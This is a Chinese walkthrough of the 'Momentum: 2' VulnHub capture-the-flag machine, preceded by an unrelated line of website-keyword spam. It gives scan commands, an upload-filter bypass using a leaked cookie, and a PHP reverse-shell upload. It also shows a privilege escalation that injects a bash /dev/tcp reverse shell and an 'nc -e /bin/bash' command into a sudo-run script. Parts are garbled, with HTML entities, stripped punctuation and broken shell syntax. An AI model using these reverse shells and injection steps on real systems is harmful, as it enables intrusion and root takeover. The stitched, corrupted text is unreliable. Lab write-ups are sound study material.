室内设计官方网站,天津大学生专业做网站,组工网站档案数字化建设,黑糖不苦建设的网站一、准备工作
靶机下载地址#xff1a;Momentum: 2 ~ VulnHub
1.查看kali的ip
使用命令ifconfig 2.使用nmap命令
nmap 192.168.101.0/24 查看开放的端口和协议#xff1a;nmap -sV 192.168.101.114 二、信息收集
1.使用gobuster#xff0c;寻找隐藏的网站
gobuster di…一、准备工作
靶机下载地址Momentum: 2 ~ VulnHub
1.查看kali的ip
使用命令ifconfig 2.使用nmap命令
nmap 192.168.101.0/24 查看开放的端口和协议nmap -sV 192.168.101.114 二、信息收集
1.使用gobuster寻找隐藏的网站
gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 发现一个可以上传文件的网站http://192.168.101.114/dashboard.html
2.利用bp抓包软件将文件上传 上传一句话木马php文件 访问http://192.168.101.114/ajax.php.bak看到一个文件如果参数为secure值等于val1d就允许上传pdf、php、txt文件 抓包添加cookie与参数
cookie: adminG6uB6uDXMqMs -----------------------------150269877033212106221702063904 Content-Disposition: form-data; namesecure;
val1d 还有将一句话木马改成反向连接木马自动生成的反向连接木马地址https://forum.ywhack.com/reverse-shell/将自动生成的php反向连接脚本替换掉一句话木马
将修改好的数据发送到intruder里面进行爆破 添加要爆破的参数将事先写好的26大写英文字母字典添加到Payload Options爆破返回的长度一样,查看返回的参数哪个有1 将数据上传,可以发现上传成功 三、提权
1.利用php反向连接脚本连接靶机
1在kali开启监听功能nc -lvvp 8888 2访问刚才上传的反向连接脚本 (3)看一看kali那边连接情况,已经反向连接成功了 (4)第一个flag 5ssh远程连接
发现一个用户密码: athena、myvulnerableapp*使用命令ssh athena192.168.101.114 6提权payload
查看该用户的权限并且该用户能够利用引用root相关的执行文件有哪些 1.cat /home/team-tasks/cookie-gen.py 将反弹root权限的shell命令存入seed变量执行
echo bash -c exec bash -i /dev/tcp/192.168.101.114/4444 1 | base64 1.sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
2.;nc 192.168.101.10 4444 -e /bin/bash; 3.反向连接nc -lnvp 4444 4.优化命令执行终端执行下面命令进入python交互式(注意要下载python环境才能运行):
python -c ‘import pty;pty.spawn(“/bin/bash”)’ 5.第二flag